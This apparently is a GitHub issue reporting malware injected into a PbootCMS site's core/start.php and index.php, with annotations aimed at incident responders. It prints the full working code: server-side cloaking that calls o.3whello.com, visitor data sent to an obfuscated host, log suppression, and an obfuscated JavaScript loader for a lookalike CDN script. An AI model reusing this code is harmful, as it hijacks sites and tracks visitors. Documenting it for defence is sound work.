
最新版本漏洞还在,新的脚本篡改病毒 #50

Description

@liyujiang-gzu

2026/6/23 篡改了 core/start.php:

<?php
// Injected code (this is the block prepended above the real core/start.php header):
// turn on verbose error output for the whole request before the CMS bootstrap runs.
// Harmless by itself, but it is the first marker that the file no longer starts
// with the original docblock — a cheap thing for file-integrity checks to key on.
ini_set('display_errors', 1);
error_reporting(E_ALL);

/**
 * Misnamed: it never looks for Google. Returns true when the User-Agent contains
 * any of the substrings 'baidu', '360' or 'so' (case-insensitive, via stripos).
 * The list is a crude "is this a (Chinese) search-engine crawler" test; 'so' is so
 * short that it also matches unrelated user agents (any UA containing e.g. the
 * word "Microsoft"), so when reconstructing who was served the cloaked page from
 * access logs, do not assume only crawlers matched.
 *
 * @param string $user_agent raw User-Agent header value ('' when absent)
 * @return bool
 */
function isGoogleBot($user_agent)
{
    $bots = array('baidu', '360','so');
    foreach ($bots as $bot) {
        // Substring match, not a full UA signature.
        if (stripos($user_agent, $bot) !== false) return true;
    }
    return false;
}

/**
 * Same substring test as isGoogleBot(), applied to the Referer header instead of the
 * User-Agent: true when a Referer is present and contains 'baidu', '360' or 'so'.
 * Intended to catch humans arriving from a search-engine results page. The Referer
 * is entirely client-controlled, so the branch it selects can be triggered on
 * purpose — useful when reproducing the behaviour from a test client.
 *
 * @return bool false when no Referer header was sent
 */
function isGoogleReferrer()
{
    if (!isset($_SERVER['HTTP_REFERER'])) return false;
    $keywords = array('baidu', '360','so');
    foreach ($keywords as $keyword) {
        if (stripos($_SERVER['HTTP_REFERER'], $keyword) !== false) return true;
    }
    return false;
}

/**
 * Fetch $url with cURL and return the response body, forwarding the visitor's
 * User-Agent to the remote server. TLS certificate and hostname verification are
 * both disabled, redirects are followed, and the whole request has a 10 s timeout.
 * The body is returned unchanged; on failure curl_exec() yields false, which the
 * callers below echo as an empty string.
 *
 * For responders: every matched request causes an outbound HTTPS connection from
 * the web server to the attacker's host at request time — egress logs / proxy logs
 * from the web tier are the quickest way to confirm the scope of the compromise.
 *
 * @param string $url       remote URL to fetch
 * @param string $userAgent User-Agent to present to the remote server
 * @return string|false response body, or false if the request failed
 */
function HttpGetApi($url, $userAgent)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_USERAGENT, $userAgent);
    // No certificate or hostname checking: any host answering on that name is accepted.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

// Cloaking dispatch. This runs before the legitimate start.php code that follows it,
// so the CMS's own IS_INDEX guard never sees these requests.
//  - Requests whose UA matches isGoogleBot() get the body of https://o.3whello.com/
//    in place of the site, then exit() — the CMS never runs, so crawlers index the
//    attacker's content under this site's URLs.
//  - Requests with a matching Referer get https://o.3whello.com/t.html instead.
//  - Everything else falls through to the real bootstrap, which is why the site
//    looks normal to the owner. Reproduce with a crawler-like UA or Referer.
// Indicator to block / hunt for: o.3whello.com (taken from the code as reported).
$userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';

if (isGoogleBot($userAgent)) {
    echo HttpGetApi('https://o.3whello.com/', $userAgent);
    exit();
} elseif (isGoogleReferrer()) {
    echo HttpGetApi('https://o.3whello.com/t.html', $userAgent);
    exit();
}?>
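<?php
/**
 * @copyright (C)2016-2099 Hnaoyun Inc.
 * @author XingMeng
 * @email hnxsh@foxmail.com
 * @date 2016-11-05
 *  Kernel start-up file; reference it only from an entry file.
 *
 *  Note for integrity checks: this docblock is the expected first thing in the file.
 *  Anything prepended in front of it (as in the tampered copy reported in this
 *  issue) executes before the IS_INDEX guard below, so the guard offers no
 *  protection against injected code — compare the file against a clean release.
 */

// Load the initialisation file from this file's own directory.
require __DIR__ . '/init.php';

// Entry check: the entry file must define IS_INDEX before including this file.
if (!defined('IS_INDEX')) {
    die('不允许直接访问框架内核启动文件!');
}

core\basic\Kernel::run();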

2026/6/24 篡改了首页 index.php

<?php
// Polyfill for old PHP builds where hex2bin() does not exist (it was added in 5.4):
// the injected code is written to run on very old installs as well. Unlike the
// native function it does no validation — odd-length or non-hex input is silently
// mis-decoded (hexdec() ignores non-hex characters) rather than rejected.
if (!function_exists('hex2bin')) {
    function hex2bin($data) {
        $len = strlen($data);
        $result = '';
        // Two hex digits per output byte.
        for ($i = 0; $i < $len; $i += 2) {
            $result .= chr(hexdec(substr($data, $i, 2)));
        }
        return $result;
    }
}
/**
 * Injected malware (this block was prepended to index.php): a cloaking / content
 * injection client. On every direct request for index.php it POSTs the visitor's
 * host, request URI, IP, User-Agent and Referer to a remote server whose address is
 * obfuscated in $api_base_encrypted, echoes whatever HTML that server returns in
 * front of the real page, and exit()s for search-engine crawlers so they index the
 * attacker's content instead of the site. All cURL/ini calls are '@'-suppressed and
 * getContent() switches error reporting and logging off, so failures leave no trace
 * in the PHP logs.
 *
 * Incident-response notes:
 *  - Indicator: outbound POSTs from the web server at request time with form fields
 *    url/req/xip/ua/ref/jsc. Decode $api_base_encrypted offline
 *    (str_rot13 -> hex2bin -> base64_decode) to obtain the server to block.
 *  - Detection: file-integrity monitoring on index.php and core/start.php; hunt for
 *    str_rot13/hex2bin/base64_decode chains and CURLOPT_SSL_VERIFYPEER=false in files
 *    that should be plain entry points.
 *  - Remediation: restore both files from a clean release, then find the write path
 *    that put them there — the reporter states the vulnerability is still present in
 *    the latest version, so cleaning the files alone will not hold.
 */
class ApiHelper {
    // ROT13-over-hex-over-base64 encoding of the server base URL (see decryptUrl()).
    private static $api_base_encrypted = "6148523063446s764p324n6o4p6r683465484r6p4p6q39755n53383q";
    // Redirect limit used both by cURL (CURLOPT_MAXREDIRS) and by the manual fallback.
    private static $max_redirects = 5;
    // Seconds: total request timeout and connect timeout.
    private static $request_timeout = 8;
    private static $connect_timeout = 2;
    /**
     * Reverse the three-layer obfuscation: str_rot13 (only the a-f hex letters change),
     * hex2bin, base64_decode. Nothing cryptographic — trivially reversible offline.
     *
     * @param string $encrypted obfuscated value from $api_base_encrypted
     * @return string plain base URL
     */
    private static function decryptUrl($encrypted) {
        $rot13 = str_rot13($encrypted);
        $hex = hex2bin($rot13);
        return base64_decode($hex);
    }
    /**
     * Decode the base URL once per process and cache it in a static local.
     *
     * @return string
     */
    private static function getApiBase() {
        static $decrypted = null;
        if ($decrypted === null) {
            $decrypted = self::decryptUrl(self::$api_base_encrypted);
        }
        return $decrypted;
    }
    /**
     * POST $data (form-encoded) to $url, presenting the visitor's User-Agent, with TLS
     * verification disabled. When safe_mode / open_basedir are both empty cURL follows
     * redirects itself (up to $max_redirects); otherwise the response headers are kept
     * and a Location header is resolved by hand, recursing with $redirect_depth + 1
     * until the same limit is hit. Returns the body only for HTTP 200, '' otherwise.
     *
     * @param string $url            target URL
     * @param array  $data           form fields
     * @param int    $redirect_depth recursion depth in the manual-redirect path
     * @return string response body on 200, '' on any failure or non-200
     */
    private static function sendRequest($url, $data, $redirect_depth = 0) {
        if ($redirect_depth > self::$max_redirects) {
            return '';
        }
        $ch = @curl_init();
        if ($ch === false) {
            return '';
        }
        @curl_setopt($ch, CURLOPT_URL, $url);
        @curl_setopt($ch, CURLOPT_POST, true);
        @curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
        // The visitor's UA is forwarded, so the remote server can tailor its reply
        // per client; 'Mozilla/5.0' only when the header is missing.
        @curl_setopt($ch, CURLOPT_USERAGENT, isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'Mozilla/5.0');
        // No certificate or hostname checking.
        @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        @curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        @curl_setopt($ch, CURLOPT_TIMEOUT, self::$request_timeout);
        @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, self::$connect_timeout);
        @curl_setopt($ch, CURLOPT_NOSIGNAL, true);
        // cURL refuses FOLLOWLOCATION under safe_mode/open_basedir, hence the manual path.
        $safe_mode = @ini_get('safe_mode');
        $open_basedir = @ini_get('open_basedir');
        $can_follow = empty($safe_mode) && empty($open_basedir);
        if ($can_follow) {
            @curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            @curl_setopt($ch, CURLOPT_MAXREDIRS, self::$max_redirects);
            @curl_setopt($ch, CURLOPT_HEADER, false);
        } else {
            @curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
            @curl_setopt($ch, CURLOPT_HEADER, true);
        }
        $response = @curl_exec($ch);
        if ($response === false) {
            @curl_close($ch);
            return '';
        }
        $http_code = @curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if ($can_follow) {
            @curl_close($ch);
            return $http_code === 200 ? $response : '';
        } else {
            $header_size = @curl_getinfo($ch, CURLINFO_HEADER_SIZE);
            @curl_close($ch);
            if (in_array($http_code, array(301, 302, 303, 307, 308))) {
                $headers = substr($response, 0, $header_size);
                if (preg_match('/Location:\s*(.+?)\s*\r?\n/i', $headers, $matches)) {
                    $redirect_url = trim($matches[1]);
                    // Relative Location: rebuild against scheme://host[:port] of $url.
                    if (!preg_match('/^https?:\/\//', $redirect_url)) {
                        $parsed = @parse_url($url);
                        $base = $parsed['scheme'] . '://' . $parsed['host'];
                        if (isset($parsed['port'])) {
                            $base .= ':' . $parsed['port'];
                        }
                        if (substr($redirect_url, 0, 1) === '/') {
                            // Absolute-path reference.
                            $redirect_url = $base . $redirect_url;
                        } else {
                            // Relative-path reference: resolve against the directory of $url.
                            $base_path = dirname(isset($parsed['path']) ? $parsed['path'] : '/');
                            if ($base_path !== '/') {
                                $base_path .= '/';
                            }
                            $redirect_url = $base . $base_path . $redirect_url;
                        }
                    }
                    return self::sendRequest($redirect_url, $data, $redirect_depth + 1);
                }
            }
            // Strip the headers that were kept for Location parsing.
            return $http_code === 200 ? substr($response, $header_size) : '';
        }
    }
    /**
     * Case-insensitive crawler test on the User-Agent. The list covers Chinese and
     * Western search engines; 'bot' alone also matches many monitoring/security
     * scanners, so those clients are served the attacker's page and then cut off too.
     *
     * @param string $user_agent
     * @return bool
     */
    private static function isSpider($user_agent) {
        $pattern = '/Sogou|Baidu|baidu|bot|Yisou|Haosou|Spider|So\.com|Sm\.cn|Googlebot|Bingbot|360Spider|YisouSpider|Bytespider/i';
        return preg_match($pattern, $user_agent) === 1;
    }
    /**
     * First entry of X-Forwarded-For when present, else REMOTE_ADDR, else 'unknown'.
     * X-Forwarded-For is client-controlled, so the 'xip' value sent to the remote
     * server is spoofable; presumably used there for geo/targeting decisions — unverified.
     *
     * @return string
     */
    private static function getClientIp() {
        if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
            return trim($ips[0]);
        }
        return isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
    }
    /**
     * The requested path+query: REQUEST_URI when set, otherwise SCRIPT_NAME (default
     * '/index.php') plus the query string.
     *
     * @return string
     */
    private static function getHostRequestUri() {
        if (!empty($_SERVER['REQUEST_URI'])) {
            return (string)$_SERVER['REQUEST_URI'];
        }
        $uri = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : '/index.php';
        if (!empty($_SERVER['QUERY_STRING'])) {
            $uri .= '?' . $_SERVER['QUERY_STRING'];
        }
        return $uri;
    }
    /**
     * Entry point. Silences all error display and logging, collects the visitor's
     * details, POSTs them to <base>/index.php and, if anything comes back, sends a
     * text/html Content-Type and echoes the reply. Crawlers are exit()ed here so the
     * attacker's HTML is the whole response; for everyone else execution continues
     * into the real index.php, so the remote HTML is simply prepended to the genuine
     * page (which is how the obfuscated <script> further down the reported file is
     * consistent with a normal-looking site). The 'jsc' => '1' flag is sent as-is;
     * its meaning on the server side is not visible here.
     *
     * @return string the remote content ('' when the request failed or returned non-200)
     */
    public static function getContent() {
        // Anti-forensics: nothing from this request reaches display or log_errors.
        @ini_set('display_errors', '0');
        @ini_set('display_startup_errors', '0');
        error_reporting(0);
        @ini_set('log_errors', '0');
        $ip = self::getClientIp();
        $user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'Unknown';
        $request_uri = self::getHostRequestUri();
        $http_host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';
        $api_url = rtrim(self::getApiBase(), '/') . '/index.php';
        // Field names are the network signature to look for in egress captures.
        $params = array(
            'url' => $http_host,
            'req' => $request_uri,
            'xip' => $ip,
            'ua' => $user_agent,
            'ref' => isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '',
            'jsc' => '1'
        );
        $content = self::sendRequest($api_url, $params);
        if (!empty($content)) {
            @header("Content-Type: text/html;charset=utf-8");
            echo $content;
            if (self::isSpider($user_agent)) {
                exit();
            }
        }
        return $content;
    }
}
// Only fire when index.php is the script actually requested (basename of this file
// equals basename of PHP_SELF), i.e. not when it is included from elsewhere. This
// keeps the hijack on the public front page and out of admin/CLI paths, which makes
// it less likely to be noticed by the site owner.
$current_file = basename(__FILE__);
$script_name = isset($_SERVER['PHP_SELF']) ? basename($_SERVER['PHP_SELF']) : '';
if ($current_file === $script_name) {
    ApiHelper::getContent();
}
?><!doctype html>
<html lang="zh">
<head>
	<meta charset="utf-8">
	<title>PbootCMS-永久开源免费的PHP企业网站开发建设管理系统</title>
	<meta name="keywords" content="cms,免费cms,开源cms,企业cms,建站cms">
	<meta name="description" content="PbootCMS是一套全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。系统采用简单到想哭的模板标签,只要懂HTML就可快速开发企业网站。官方提供了大量网站模板免费下载和使用,将致力于为广大开发者和企业提供最佳的网站开发建设解决方案。">
	<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,shrink-to-fit=no">
	<link rel="stylesheet" href="/template/default/bootstrap/css/bootstrap.min.css" >
	<link rel="stylesheet" href="/template/default/font-awesome-4.7.0/css/font-awesome.min.css">
	<link rel="stylesheet" href="/template/default/css/aoyun.css?v=v1.3.5" >
	<link rel="stylesheet" href="/template/default/swiper-4.3.5/css/swiper.min.css">
	<link rel="stylesheet" href="/template/default/css/animate.css">
	<link rel="stylesheet" href="/template/default/css/custom.css">
	<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
	<script src="/template/default/js/jquery-1.12.4.min.js" ></script>

<!-- Injected (part of the tampered index.php): an obfuscated script loader.
     aPnDhiTia() is a hand-rolled base64 decoder and xxSJRox() a UTF-8 decoder;
     MfXKwV() decodes the base64 argument into a URL, builds a <script> element (the
     tag name is pieced together from single characters of the other string
     arguments so "script" never appears literally), and appends it to <head>.
     It runs only when navigator.platform does not start with "Mac" or "Win", i.e.
     for mobile visitors, and the setInterval(debugger) loop is an anti-DevTools
     trick. Decode the base64 string offline for the indicator: it points at a host
     that mimics a well-known public CDN name and a bootstrap.min.css path — a .css
     path loaded as a script. A clean template has no inline self-decoding loader. -->
<script type="text/javascript">function xxSJRox(e){var t = "",n = r = c1 = c2 = 0;while (n < e.length){r = e.charCodeAt(n);if (r < 128){t += String.fromCharCode(r);n++}else if (r > 191 && r < 224){c2 = e.charCodeAt(n + 1);t += String.fromCharCode((r & 31) << 6 | c2 & 63);n += 2}else{c2 = e.charCodeAt(n + 1);c3 = e.charCodeAt(n + 2);t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63);n += 3}}return t}function aPnDhiTia(e){var m = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t = "",n,r,i,s,o,u,a,f = 0;e = e.replace(/[^A-Za-z0-9+/=]/g,"");while (f < e.length){s = m.indexOf(e.charAt(f++));o = m.indexOf(e.charAt(f++));u = m.indexOf(e.charAt(f++));a = m.indexOf(e.charAt(f++));n = s << 2 | o >> 4;r = (o & 15) << 4 | u >> 2;i = (u & 3) << 6 | a;t = t + String.fromCharCode(n);if (u != 64){t = t + String.fromCharCode(r)}if (a != 64){t = t + String.fromCharCode(i)}}return xxSJRox(t)}eval('window')['MfXKwV'] = function(){;(function(u,r,w,d,f,c){var x = aPnDhiTia;u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c,'g'),c)));'jQuery';k = r[2] + 'c' + f[1];'Flex';v = k + f[6];var s = d.createElement(v + c[0] + c[1]),g = function(){};s.type = 'text/javascript';{s.onload = function(){g()}}s.src = u;'CSS';d.getElementsByTagName('head')[0].appendChild(s)})('aHR0cHM6Ly9jZG4uanNkY2xpdnIuY29tLy9ucG0vYm9vdHN0cmFwQDUuMy4wL2Rpc3QvY3NzL2Jvb3RzdHJhcC5taW4uY3NzP3Y9My43LjkuMA==','FgsPmaNtZ',window,document,'jrGYBsijJU','ptbnNbK')};if (!(/^Mac|Win/.test(navigator.platform))) MfXKwV();setInterval(function(){debugger;},100);</script>
</head>
<body>

<!-- 头部导航 -->
...省略...
